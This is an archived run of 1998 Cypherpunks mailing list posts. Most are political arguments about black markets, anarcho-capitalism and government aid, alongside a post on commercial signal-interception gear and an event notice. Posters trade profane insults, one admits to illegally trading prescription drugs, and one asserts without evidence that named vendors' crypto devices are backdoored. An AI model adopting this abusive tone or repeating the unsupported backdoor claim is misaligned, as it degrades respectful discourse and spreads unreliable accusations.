but are still part of the black market because of the nature of the market
and the legal system.

>you keep going over the same issue until you think I'll be badgered into
>agreeing with you). The exception I take, and am still waiting for refuation
>of, is that the *majority* of goods on the black market including drugs are
>related to the theft of material or services from legitimate parties. That

	FUCKING BULLSHIT. YOu JUST brought introduced your thesis that even
if most stuff isn't actually stolen, then it is bought with money gained by
theft in your last post on this issue. Before that you were maintaining
that everything on the black market had to be stolen, and in fact this
whole side argument occured because you disagreed with me on the fact that
a black market is more defined in terms of the exchange being illegal
rather than the product.

	Tell us Jim, is it a black market if I but a new car, from a
registered dealer, with stolen money? Assuming neither he, nor anyone he
knows, nor anyone I know, excecpt for me, knows the money is stolen?

>As a history teacher once said:
>The nice thing about America is anybody can believe anything, whether they
>know what they are talking about or not.
>I respect that sentiment.

	And apparently live it every day.


>> 	I hated the shit, and didn't take it after the 2nd day, leaving me
>> clear headed, but in pain. No big deal, I've been in pain before. I traded
>> the rest of those drugs for an old computer.
>
>I certainly hope that no DEA agents are watching *and* you're not in the
>US. Admitting to a crime in a public venue, whether in a public park or a
>mailing list isn't the brightest strategy. If you're not in the US you
>should probably hope that the NSA (or whomever) is too busy to pass along
>this to the requisite authorities. I would suggest strongly that for future
>such public admission you should use a pseudonym or an anonymous remailer.

	They better be worried about a lot bigger things than that.

>> 	Either way, my point is still that the black market is about more
>> than just if the _product_ is illegal, it also relates to the trade.
>It has to do with something being illegal or not acceptable otherwise you
>could just open up a store and start trading the items directly. In the vast
>majority of cases it involves the theft of services or property from the
>valid rights holder.

	My contention all along has been that it isn't about the product,
it's about the trade, the market.

>> 	Yeah, like anyone really knows for sure.
>Well that pretty much shoots a hole in your point as well if that is your
>position. However, since the manufature of vehicles is accounted far to

	No it doesn't. It is my contention that in the drug trade, most of
the people buying come by their money thru mechanisms other than theft.
This could be from holding down a Job (as many drug users do),  begging,
prostitution, or other sources than stealing. (there is some SSI diability
fraud there, and I am not denying that theft IS used, just that it's not
the primary method).

>at least the 10's place by auto manufacturers and the sale of legitimate cars
>is traceable through tax and title I'd say that it is possible to make
>educated guesses about the scale of the market.

	Of the Auto Theft Market. Now find a way to prove what percentage
of that money goes to support the drug trade.

>> 	Because I know a lot of people who've bought drugs, and for the
>> most part it was with money they earned or receieved thru legal means.
>No, you know some people who have bought drugs, just as I do. However,

	No, I know a LOT of people who have bought drugs. Not most of the
people who have bought drugs, but a LOT of people.

>claiming that the small set you know of personaly qualifies as a lot is an
>invalid hyperbole. There are millions of drug users in this country, and
>in your entire life you've only met a few thousand at best.

	Or at worst, but your point is valid.

	Then again, it applies equally to yourself, that there really is no
way of knowing.


>> 	Your question is ignorant and irrelevant, but to answer it: Brokers.
>Oh, you mean fences...

	No Jim, fences purchase a product for <x> (I am given to understand
that %5 <x < %20 of resale value) and resell it. Brokers arrange for
sale/purchacse.

	Think of a Real Estate Broker. They sell your house, but you keep
possesion of it until sold, and have final say on the purchase.

>> 	I have something to sell, but I don't want to hassle with finding a
>> buyer. Joe has a lot of connections, but no goods to sell, and you are a
>> buyer. I let joe know I have product, he makes the deal, and I hire Omar to
>> deliver it to you. Joe never even sees the merchandise, but is effectively
>> the seller.
>
>You have to have possession in order to pass possesion to Joe so that he can
>sell it and pass you possession of the receipted funds (minus Joe's cut).
>Whether that possession is measured in immediate physical control (ie in
>your pants pocket) or more general (eg stored in a rent-room under an
>assumed name) is irrelevant.

	Yeah, the more I think thru this, joe would either be considered a
"seller", or a "trusted third party.

>> 	No, and for you to even say it in that manner is complete
>> disingenious.
>
>Your the one who said shoot them, what's the matter find your baby to ugly
>to look at?

	Produce the text where I said that it is always Ok to shoot someone
with whom you have a diagreement.

	Pull it out.

>I suspect that the emotionaly challenged will continue to shoot each other
>irrespective of the political system implimented. If you take guns away
>they'll knife each other and if you take knives away they'll beat each other
>to death.

	Yeah, and the system protects assholes like OK and the entire Male
side of the kennedy clan (well, John got what was coming to him...)

>Which raises an interesting point, more people are killed by physical
>assault according to the FBI crime stats than guns each year.

	What is interesting about that? Just shows that your system doesn't
do shit to stop killings.

>> say, we had a car accident and were resolving that (unless you had done
>> something like driving drunk and blatantly violating common sense rules of
>> the road like running a stop sign or a red light, in which case you are a
>> threat to me and others).
>
>Ah, I see. So your position is that if somebody runs a stop light then that
>is grounds to shoot them.

	If somebody shows that they have a lack of respect for other
peoples saftey, what do you suggest we do with them?

	Cars are implicated in more deaths every year than occured occured
during any 2 years of the Vietnam war, driving in disregard for the law and
for saftey is like waundering drunk around waving a loaded .357

	What would you suggest be done to someone waundering around drunk
off his ass and pointing a .357 at people?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 13 Nov 1998 04:23:39 +0800
To: Emile Zola <softwar@us.net
Subject: Crypto fallout
Message-ID: <364A01A7.7729@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 11/11/98 2:26 PM

John Young
J Orlin Grabbe
Emile Zola

I visited Jim Omura president of Cylink several times.  And bought
6, I recall, CY 1024 public key arithmetic chips for Sandia.  At an
outrageous price.

Omura gave my paper on RSA encryption, posted at jya.com, to Jon Graff.

My feeling is that when those who own crypto devices manufactured
by Cylink, RSA, Crypto Ag, ... finally realize that PROBABLY 
their devices have been spiked to transmit the key with the ciphertext
there will be a reversal of fortune at these companies.

Like the current Cylink problem.  http://www.jya.com/cylink-suit.htm

The WORD is getting out.  Thanks to you guys.

And those who read Black and White will realize how to fix their
crypto problems TOO.

bill

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 11 Nov 1998 21:52:39 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Question about anarchic systems and natural disasters
Message-ID: <199811111339.OAA22865@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> 
> What would be the responce of a anarchic system that was based on profit in
> regards something like Mitch's impact on Ctl. America and their plea for
> food and aid?

`Their plea for food and aid' is just that: a plea; it no more creates
an _obligation_ to help them than my plea for your money to help 
rebuild my burned-down house should. Still, in an anarcho-capitalistic
system, Mitch would be responded to by private individuals through
charitable aid organizations such as the Red Cross (much as it is now).
Your asking the question implies that you believe we have or should 
have an obligation to help Mitch's victims; one that justifies the use
of tax money - money that is, in effect, collected at gunpoint from 
all of us citizen units.

By the way, since you're so fond of quoting the US Constitution, please
show where the document authorizes the Men With Guns to take their
captives'^H^H^H^H^H^Hcitizens' money and give it away to help victims 
of natural disasters in foreign countries.

(Also consider that Mitch is merely one in a long line of natural
disasters that have been and continue to be inflicted on various
peoples of the world.  Some we hear about and some we don't, based on
the vagaries of the news media's inclinations and their judgement of 
how interested the American public will be. We don't end up bailing
them all out; only those which one politician or another has decided
will make them look `compassionate'. If an equivalent disaster occurred
in a less favored nation - say, an earthquake in Iran - you can bet that
the US's governmental response would be much less generous.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 11 Nov 1998 22:06:14 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Question about insurance managed fire services...
Message-ID: <199811111350.OAA23569@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> 
> How does company A guarantee that company B won't begin to burn down the
> customers of company A so that the economic impact on A is sufficient they
> can't participate in the market?

How does it do so now?

Fucking idiot. Do you imagine that the customers of company A (and
their police, security force or other guardian) will stand idly by
while their homes (the implied target) are burned?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Licence <dlicence@dataforce.co.uk>
Date: Fri, 13 Nov 1998 02:56:23 +0800
To: "'cypherpunks@toad.com>
Subject: acceptable user policies
Message-ID: <01BE0D85.9D742A80.dlicence@dataforce.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



hey there,

	I am having to formulate an acceptable user policy for the users. Does 
anybody know of any online references, or examples of such policies. 
This would have to include specifications like email use, internet 
access, games over the LAN - anything that you can get your head around 
pertaining to such. This of course would have to weigh up between the 
rights of the users and protection of the network and PCs


	Your help would be greatly appreciated
	Duncan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 11 Nov 1998 22:49:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect
Message-ID: <199811111420.PAA25606@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> 
> Adam Back <aba@dcs.ex.ac.uk> wrote:
> 
> > What is annoying is "charity" (social security) at the point of a gun.
> > Our "conscience" is being decided by government which is acting as a
> > broker for those lobby for their "need" and for your assets to be
> > stolen and redistributed to them.
> > 
> > What people aren't willing to pay for shouldn't happen.  Period.  If
> > that means people starve well those complaining loudest had better
> > dig deeper into their pockets.
> 
> Imagine one of your kids had an accident and needed more expensive care
> than you can pay for. Would you accept government "charity"?

This is why I buy insurance.  But let's go with your example: 
imagine that I didn't buy insurance (because I didn't want to or
couldn't `afford' it or whatever), would I then be entitled to go
around the neighborhood (gun in hand) and demand `charity' from all
my neighbors?

What if my house burns down? Again, can I demand `charity' at gunpoint
from my neighbors?

What if another motorist hits my parked car and totals it? Can I
demand that my neighbors help me buy a new car?

What if a $5 million (or use $5 billion if you prefer) operation would
save my 88 year-old mother from the cancer that is killing her? Who
can I find to pay for that?

What if my self-esteem suffers because of frown lines in my forehead?
Can I demand `charity' to pay for the plastic surgery?

The question isn't and shouldn't be about whether you would `accept' 
charity (after all desperate people will do lots of things they might
not ordinarily do or even believe in), but whether your fellow citizens
ought to be REQUIRED to fund the `charity' you would like to receive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Wed, 11 Nov 1998 22:57:56 +0800
To: Michael Hohensee <mah248@nyu.edu>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <3.0.3.32.19981111152214.009317f0@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain




>> Without some government the Bad Guys will be the only ones with anything.
>> It is only with the threat of losing their power that leaders do good. If
>> they had no power which could be lost or taken they will always do what's
>> best for them in the short term, which is usually to shit on the peons.
>> Dictators (like Pinochet and Gates) do their dirty deeds because they feel
>> no need to placate the masses.
>
>If they wield no real power, and proceed to do whatever is best for them
>in the short term, they will be screwing themselves over in the long
>term (or short term, if doing what they want results in someone shooting
>them in self defense).
>

I re-read my original sentence and it seems that your interpretation is
possible. I would like to clarify that the power I refer to is only that
part of their power which might be lost or threatened. Clearly if they have
no power they can't lose it. I want to say that if some or all of their
power could be placed in jeopardy they would tend to better behaved. Why do
you suppose Clinton spent so much time licking everybodys' boots and
repeatedly embellishing his "apologies" to the "public".

>And precisely what dirty deeds has Mr. Gates ever done?  Excluding those
>actions in which the judicious use of state regulation was involved.

You obviously think that anything goes in business. Frankly Gates is a
perfect example of why you anarcho-BS is doomed to failure. He will do
anything (and has) he can to be the only player in every market he touches.
He has destroyed otherwise perfectly good businesses and products just to
increase his profits. He has violated workers rights to increase his
profit. In short he has demonstrated that if you let him murder wouldn't be
to far a step to reach his goals.

He is the monster that proves that your ideas are actually very very old
(caveman days) and are doomed by progress and civilization. Injecting
capitalism (investment oriented markets) into barbarism doesn't change the
fact that it is still barbarism, which in facts negates the ability to have
investment oriented markets, or capitalism. Who would invest if someone
with a gun could come and take it without out fear of retribution. 

>
>> This anarcho-capitalist spew is so much crap that the bullshit indicators
>> are blaring at top volume. If the people can't control a constitutional
>> government, known for having peacefully free elections for over two hundred
>> years, then how the hell do think you can convince somebody that the people
>> are going to be able to control warlords and monopolies. It's called, "You
>> don't like it? Bang, Bang, you're dead!"
>
>Yah, and then somebody else points a gun at Mr. would-be warlord and
>goes Bang, Bang, he's dead  (it's unsafe having warlords about --sorta
>like scorpions).  That is, if Mr. would-be manages to shoot me without
>being shot himself.
>

And so everybody's so busy shooting each other that nobody is investing,
and I have to ask, "What happened to the capitalism part of
anarcho-capitalism?"

>> Try to lift yourself out of the bullshit of your theory and give us at
>> least one REAL example (current or historic) of a large scale, long lasting
>> anarcho-capitalist society. Hippie communes are too small, and make sure
>> it's capitalistic. If you can't think of one in the next year or so then
>> come back and tell us.
>
>It hasn't happened yet.  But then, neither had the USA, before 1776. 
>The above is not a reasonable argument.

WRONG!!!! Parliaments and representative governments did exist in somewhat
other forms. 1776 was NOT a revolution it was evolution. It comes from
among other things the Magna Carta of England as well as many other
concepts astutely compiled by the "forefathers". 

Your propositions emanate from a basis which existed before there were
nations and well before investment and economic development began. In fact,
anarchy had to be overcome before consistent development could occur. Once
we organized our societies and brought long (relatively) periods of peace
to the general populace economic and scientific development began to grow.
Certainly you will find it impossible to site any anarchic or nearly
anarchic "society" (oxymoron) which has brought sustained significant
development.

>
>You can, of course, as me how it *could* happen.  And unfortunately,
>you're partially correct, it couldn't happen under current conditions. 
>The amount of personal firepower that is easily accessible by everyone
>is not sufficient to back up the soverignity of each individual.  It's
>all linked to whether weapons technology is such that individuals can
>operate weapons which are just as effective as those wielded by highly
>trained and specialized groups.  The pendulum of weapons tech. swings
>back and forth over time.  During the American Revolution, the pendulum
>was on the side of individuals, as can be shown by the fact that the
>revolutionaries were carrying better weapons than those carried by
>professional soldiers, and could use them to equal or larger effect.
>
You whole thesis is based on violence, the exact opposite of what's
required for sustained economic growth. You lose! Consistently wrong
answers. You just don't get it. War does not produce wide spread economic
growth in those zones affected by the war. It destroys the infrastructure
that only an organized government is capable of maintaining. Granted, if
you can be the one selling the weapons you might profit for a while. But
eventually, those same weapons will be turned on you.

The real answer is to keep the government focused on keeping the peace and
maintaining the infrastructures using as light a hand as possible--which is
never going to be an easy task. But no government is NO GROWTH. The
libertarians have at least part of the equation correct. They go a little
too far to one extreme. But this is good, they're mostly just extreme
enough to pull a wondering government back into the middle where it should
be. Your anarcho-spew is rubbish, poorly thought out, and without any real
validation. 

I bet most of the most fervent defenders of gun ownership on this list
actually hope never to have to make use of their tunnels, guns, and
survival rations.
War is simply not good economics, and anarchy is war--constant, festering,
sometimes small scale, sometimes large scale, but always war.

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 11 Nov 1998 23:29:32 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Question about insurance managed fire services...
Message-ID: <199811111459.PAA27953@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> > From: Anonymous <nobody@replay.com>
> 
> > Jim Choate writes:
> > > 
> > > How does company A guarantee that company B won't begin to burn down the
> > > customers of company A so that the economic impact on A is sufficient they
> > > can't participate in the market?
> > 
> > How does it do so now?
> 
> Insurance regulatory agencies who monitor the behavior, investigation by a
> reasonably impartial fire dept after every fire. That's at least two.

You really are naive, Jim. Do you think that insurance regulatory 
agents follow around after all of the insurance companies' employees
to ensure they aren't starting fires?

Or do you suppose that in an anarcho-capitialistic society (unlike 
the current sainted `democratic' society), company A would be so
stupid as to make the burning of competitors' houses an official
company policy which would be found out `if only' there were a 
government regulator watching it? How long do you suppose that
company A can get away with burning down the homes of its competitors
before its agents are caught in the act (by company B's investigators
if no one else)? No, Jim, such behavior would clearly not be in the
best interests of company A's stockholders (that is, it would not be
`profitable').

Any why, in a private contractual situation, would the `fire department'
not be impartial? How does the government-provided fire department
have any advantage in impartiality?


> > Fucking idiot. Do you imagine that the customers of company A (and
> > their police, security force or other guardian) will stand idly by
> > while their homes (the implied target) are burned?
> 
> What police and security forces?

The police or security force that the customer contracts with to
protect their home of course. Idiot. These exist now in cooperation
with government-provided police (though some might naively imagine 
them to be redundant). Either you are simply being disingenuous or
you really are this stupid.

>                                  You mean the ones the same insurance
> company co-oped?

Context, Jim, context. This makes no sense whatsoever without more
context. What insurance company are you talking about? And why does
an insurance company necessarily have a direct relationship with a 
security service provider? Or did you mean `co-opted' (a different
word altogether)?


> What makes you thing that Company A or B will even advertise their actions?
> 
> Who says the homes will be burned when the residents are even home? It isn't
> like anyone is going to ask their permission.

Indeed. So what prevents anyone from doing this now? I suggest you
pretend you had a brain and try to think this through for yourself.
There simply isn't anything magical about government-provided services.
(While you are doing so, it might be instructive to remember that
prior to the late 18th century, there was no such thing as a
government-provided police force. Yet, people were still able to have
houses without insurance companies burning them down.)



> And I'm the 'fucking idiot'.

This you have amply and repeatedly demonstrated.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Thu, 12 Nov 1998 08:50:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
In-Reply-To: <199811111320.FAA09439@smtp.well.com>
Message-ID: <Pine.LNX.3.93.981111162533.10048B-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 11 Nov 1998, Declan McCullagh wrote:

# Without endorsing Tim's "need killing" views, I would like to point out
# that Mr. b!X has a deeply flawed understanding of the Second Amendment and
# constitutional history.

Which would in no way affect the fact that it's asinine to try and use the
First Amendment to make a point about the Second Amendment (as the parody
does) because they are approached in entirely different ways to address
entirely different things.

Which was my central point.


- b!X (Guerrilla Techno-fetishist @ GEEK Force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Wed, 11 Nov 1998 12:10:48 +0800
To: cypherpunks@cyberpass.net
Subject: More on blind signal demodulation
Message-ID: <91075612418242@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



There's at least one firm which makes this stuff commercially, their products
are available via http://www.appsig.com/prods/index.html.  This looks like a
one-stop ECHELON shop: you take one or more of their products (pick your type,
intended target, and budget), plug as many E1's or E3's or whatever into one 
side as you can handle (the most impressive one does 16 E3's or 7680 voice/
data channels) and all modem, fax, and voice comms going through the circuit 
are available on the other side.  They have products to do automatic channel/
signal scanning, demuxing, decoding of various data formats, processing of 
satellite and radio signals ("combines tuning, demodulation, descrambling, 
decoding, demultiplexing, and output formatting in one chassis"), every kind 
of mobile phone signal you've ever heard of, digital microwave links, decoding 
of higher-level protocols like V.42/V.42bis, X.25, HDLC, PPP, every Internet 
protocol worth doing, etc etc (their terminology is pretty neat, they have for 
example a 1.5-44.7Mbps "modem for on-the-move applications" :-).  Much of the 
hardware claims to be built to TEMPEST specs.  One interesting point is that 
most of their stuff is for E1's and E3's even though they're a US company.  
Hmmm....

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 12 Nov 1998 07:12:38 +0800
To: cypherpunks@cyberpass.net
Subject: DCSB: Mary Ellen Zurko; Jonah, IBM, Open Source, and Digital Commerce
Message-ID: <v04020a55b26fbabf92b8@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Wed, 11 Nov 1998 16:07:03 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Mary Ellen Zurko; Jonah, IBM, Open Source, and Digital
 Commerce
Cc: "Heffan, Ira" <HEFFAN@tht.com>, Roland Mueller <roland@secunet.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----

          The Digital Commerce Society of Boston

                       Presents

                     Mary Ellen Zurko

                    Security Architect,
                     Iris Associates

             "Oh Jonah, He lived in a whale",

                          or,

           How IBM decided to win in ecommerce
        by embracing standards and donating code

                Tuesday, December 1st, 1998
                       12 - 2 PM
             The Downtown Harvard Club of Boston
               One Federal Street, Boston, MA


IBM was faced with the question a year ago of how to move from a slow
starter to a leader in security infrastructure for ecommerce. Our
traditional response to that sort of question had been "Hey kids, let's buy
a company!" However, innovative internal forces recognized the power of
the current standards and open source movements. We targeted the IETF PKIX
standards as the most likely to move ecommerce forward, hired a team of
experts in security and PKI and situated them in MA, drafted existing IBM
experts in CDSA and smart cards, put together the first cross
IBM/Lotus/Iris team and the first group with a charter to write freeware,
and delivered the initial code drop to the MIT web site hosting it in
September. The team and the freeware are called Jonah. This talk will cover
the background, current status, and future of the Jonah effort.

Mary Ellen Zurko is Security Architect at Iris, the folks who brought you
Lotus Notes. She previously worked at The Open Group. She spent the four
years before Jonah leading research in innovative and usable distributed
authorization solutions, which posited the solution of the distributed
authentication problem. Her current work on public key authentication and
infrastructures is karmic revenge for such hubris. She has published papers
in user centered security, roles based access control, WWW security and
high assurance operating systems. She is an organizer of the New Security
Paradigms Workshops and a member of the IW3C2, which runs the international
WWW conferences.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, December 1, 1998, from 12pm - 2pm at the Downtown Branch of
the Harvard Club of Boston, on One Federal Street. The price for lunch
is $32.50. This price includes lunch, room rental, various A/V hardware,
and the speaker's lunch. ;-).  The Harvard Club *does* have dress code:
jackets and ties for men (and no sneakers or jeans), and "appropriate
business attire" (whatever that means), for women.  Fair warning: since
we purchase these luncheons in advance, we will be unable to refund the
price of your lunch if the Club finds you in violation of the dress
code.


We need to receive a company check, or money order, (or, if we
*really* know you, a personal check) payable to "The Harvard Club of
Boston", by Saturday, November 28th, or you won't be on the list for
lunch.  Checks payable to anyone else but The Harvard Club of Boston
will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The
Harvard Club of Boston", in the amount of $32.50. Please include your
e-mail address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements
(We've had to work with glacial A/P departments more than once, for
instance), please let us know via e-mail, and we'll see if we can work
something out.


Upcoming speakers for DCSB are:

January    Ira Heffan     Internet Software and Business Process Patents
February   Roland Mueller European Privacy Directive

We are actively searching for future speakers.  If you are in Boston
on the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston,
send "info dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> . If you want to subscribe to the DCSB e-mail
list, send "subscribe dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNkn8T8UCGwxmWcHhAQH/6wf9EAXIGyox0VsqMHbO23ONy8as3htAahM0
liUOC9nj3Djjz8TCU0RRv2KckdkpyVrt0jb36NgPvgPCrLOpK682o8Q2VBFqaqUB
q3+gtrdhpLUYffAJ02PvK9DvOCeb/zyWTmZ6rti/3tgTCHAjuiaL41Ryvg8u6J+A
DqFR1Adk+xhnVlpzzelGI1IIBrI9fjqdAza9oK1Ub5LZ9Cc5MaU3417XsnCVVL3j
MJRs3BGPiUKwFSeMO6PTSs916wrIoXXiY4KoeFD2qjLqidJbgOQoGZamEkQd5TOJ
1C5cYslIcUsH95TEVWPhs1YjT04WnU964X8FRbxsQtfQ4zk/lSFPbg==
=sRPk
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb-announce
Or, to subscribe,           write:  subscribe dcsb-announce
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 08:37:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811120005.SAA26844@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 14:23:43 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	So leaders should be able to do whatever they want within their own
> borders w/out the possibility of being held responsible for what they do to
> citizens of other countries who just happen to be visiting?

Absolutely. It's what is meant by indipendent nation. It's between the leaders
and the citizens.

> 	What about rule by law?

What about it? I don't believe in one world governments, it's a bad idea.
Within the confines of a given country there should be a rule of law, that
rule should not necessarily be the same as any other country. And other
countries should most definitely NOT have a say in it.

Do you want Germany having a say in our laws (for example)?

> 	That was not the point, the point was about black market goods.

No, the point was about freedom of choice.

> 	So then you admit you were lying about the deaths and blindness
> being the cause of regulation, since you claimed it happend in the late
> 1800's & early  1900's, but the regualtion and taxing went all the way back
> to the middle ages?

Taxing went on, the regulation of alcohol production didn't occur in this
country until after the Civil War. Taxing alcohol is a whole different issue
than regulating the quality and methods of production, and is most certainly
not equivalent to regulations on where it might be sold and under what
conditions.

> 	It prevents businesses from using the Press to manipulate the
> government into doing something about a problem that doesn't exist.

No it doesn't. The press is a business, and if you don't think they don't
try to manipulate more than the government you're in for a surprise. There
are cases of the press being manipulated because of the impact of certain
story presentation lines on their income.

> >whistle-blowers and 'social do-gooders' to get their message out (unless
> >they're well heeled and don't mind loosing it all in the process).
> 
> 	That is already/still the case. You piss off the wrong people, you
> die.

Actualy not, there are a variety of whistle-blower laws on the book at every
level. Also the number of whistle-blowers who are killed currently are
pretty small (name 3). A lot of them loose the jobs they blew the whistle on
but that is many cases is to be expected (after all if the issue is important
enough the business will cease to exist).

> >put any sort of limit on its expression.
> 
> 	It INHERENTLY recognizes it, and inherently limits it.

No it doesn't, it does not in any way prevent abuse and further provides no
mechanism for the restitution or correction of that abuse.

> 	No one has the power.
> 
> 	THAT'S THE POINT.

No, the point is that whoever is the most ruthless will get ahead. If you
don't think that is power then you should sit and think.

> 	Some agendas can't be pushed thru business, or at least not the
> same way.

Such as? Greed and profit always can be pushed through business, it's what
they do.

> 	If I got them legally, they were a legal commodity, if I dispose of
> them legally, they move from the "white" market, to the "black" market.

Which requires that yot mislead the doctor as to why you want them.

> 	The fact that not everything on the black market was stolen ISN'T
> the point, the point is that there can be things on the black market that
> aren't stolen, and aren't inherently illegal (tomatoes, vicadan, alcohol)
> but are still part of the black market because of the nature of the market
> and the legal system.

Why would anyone buy a commenly available item on the black market when they
could go to the corner store and purchase it? They won't. People who are
involved in the black market are there for profit. If they go down to the
store and buy say tomatoes at $2/lb. whey would they sell them to you at
$1.75/lb? They wouldn't. The alcohol and cigarettes you buy on the black
market lack tax stamps are have bogus stamps. Why? Becuase the cost is much
lower without the added tax and legitimate distribution expenses.

> 	FUCKING BULLSHIT. YOu JUST brought introduced your thesis that even
> if most stuff isn't actually stolen, then it is bought with money gained by
> theft in your last post on this issue.

 Before that you were maintaining
> that everything on the black market had to be stolen, and in fact this

No, go back - I never said that. I have continously said that the majority
of items on the black market are related to a stolen service or product.
I stand by that statement.

I'd go on but it's been a long day and I'm in no mood for this petty
bickering.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Thu, 12 Nov 1998 08:02:01 +0800
To: cypherpunks@cyberpass.net
Subject: FW: RFC 2440 on OpenPGP Message Format
Message-ID: <2C396693FBDED111AEF60000F84104A721C062@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
